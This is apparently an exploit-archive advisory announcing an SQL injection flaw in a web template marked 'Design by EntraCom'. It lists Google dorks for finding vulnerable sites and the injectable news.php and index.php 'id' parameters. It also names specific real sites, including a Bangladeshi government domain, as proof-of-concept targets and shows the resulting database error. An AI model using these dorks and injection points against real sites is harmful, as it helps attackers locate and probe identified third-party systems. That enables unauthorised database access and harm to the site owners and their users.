#################################################################################################
# Exploit Title : Design by Dream EntraCom DreamTemplate Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : dreamtemplate.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks :
intext:''Design by EntraCom''
intext:''Design by Dream EntraCom''
# Exploit :
/PATH/news.php?id=[SQL Injection]
/PATH/index.php?id=[SQL Injection]
#################################################################################################
# Example Sites =>
cme.gov.bd/new/news.php?id=6%27 => [ Proof of Concept for SQL Inj ] => archive.is/HJxoi
nazrulacademy.org.bd/news.php?id=9%27 => [ Proof of Concept for SQL Inj] => archive.is/l6BKZ
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/covmeg/public_html/new/news.php on line 62
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################